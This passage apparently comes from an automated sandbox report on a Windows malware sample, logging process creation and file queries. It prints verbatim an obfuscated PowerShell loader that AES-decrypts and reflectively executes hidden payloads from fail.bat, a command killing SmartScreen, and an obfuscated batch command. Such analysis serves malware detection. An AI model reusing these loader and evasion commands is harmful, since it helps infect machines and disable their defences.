                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\System32\userinit.exe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('bsr0ba9vyrobkmxsgk+/kmstteaihtjskhdfy6hsuik='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('qbsb4zwde0fsbmlarzeayq=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $kszhy=new-object system.io.memorystream(,$param_var); $wxrgu=new-object system.io.memorystream; $ctahr=new-object system.io.compression.gzipstream($kszhy, [io.compression.compressionmode]::decompress); $ctahr.copyto($wxrgu); $ctahr.dispose(); $kszhy.dispose(); $wxrgu.dispose(); $wxrgu.toarray();}function execute_function($param_var,$param2_var){ $aturz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $kxyrp=$aturz.entrypoint; $kxyrp.invoke($null, $param2_var);}$iipon = 'c:\windows\fail.bat';$host.ui.rawui.windowtitle = $iipon;$jhmmh=[system.io.file]::('txetlladaer'[-1..-11] -join '')($iipon).split([environment]::newline);foreach ($eldqw in $jhmmh) { if ($eldqw.startswith('nzysdskvsfsczborzgdc')) { $whkki=$eldqw.substring(20); break; }}$payloads_var=[string[]]$whkki.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c @echo off set a1zr=ynb0frmp4gijbxjaqusk6cc5erihfyahvwd31pol7wdnqsktu8goe2ltx9zmzv cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c @echo off set a1zr=ynb0frmp4gijbxjaqusk6cc5erihfyahvwd31pol7wdnqsktu8goe2ltx9zmzv cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('bsr0ba9vyrobkmxsgk+/kmstteaihtjskhdfy6hsuik='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('qbsb4zwde0fsbmlarzeayq=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $kszhy=new-object system.io.memorystream(,$param_var); $wxrgu=new-object system.io.memorystream; $ctahr=new-object system.io.compression.gzipstream($kszhy, [io.compression.compressionmode]::decompress); $ctahr.copyto($wxrgu); $ctahr.dispose(); $kszhy.dispose(); $wxrgu.dispose(); $wxrgu.toarray();}function execute_function($param_var,$param2_var){ $aturz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $kxyrp=$aturz.entrypoint; $kxyrp.invoke($null, $param2_var);}$iipon = 'c:\windows\fail.bat';$host.ui.rawui.windowtitle = $iipon;$jhmmh=[system.io.file]::('txetlladaer'[-1..-11] -join '')($iipon).split([environment]::newline);foreach ($eldqw in $jhmmh) { if ($eldqw.startswith('nzysdskvsfsczborzgdc')) { $whkki=$eldqw.substring(20); break; }}$payloads_var=[string[]]$whkki.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0DC70 cpuid 34_2_00007FF6FDC0DC70
                        Source: C:\Windows\Client.exeCode function: GetLocaleInfoW,GetNumberFormatW,34_2_00007FF6FDC1A2CC
                        Source: C:\Users\user\Desktop\Winscreen.exeQueries volume information: C:\Users\user\Desktop\Winscreen.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeQueries volume information: C:\Users\user\AppData\Roaming\upx.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\upx.exeQueries volume information: C:\Users\user\AppData\Roaming\upx.exe VolumeInformation
                        Source: C:\Windows\Temp\ydztkyrb.exeQueries volume information: C:\Windows\Temp\ydztkyrb.exe VolumeInformation
                        Source: C:\Windows\Temp\ydztkyrb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Temp\ydztkyrb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Temp\ydztkyrb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\Temp\swtpd1aw.exeQueries volume information: C:\Windows\Temp\swtpd1aw.exe VolumeInformation
                        Source: C:\Windows\Temp\swtpd1aw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Temp\swtpd1aw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Temp\swtpd1aw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmoder.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
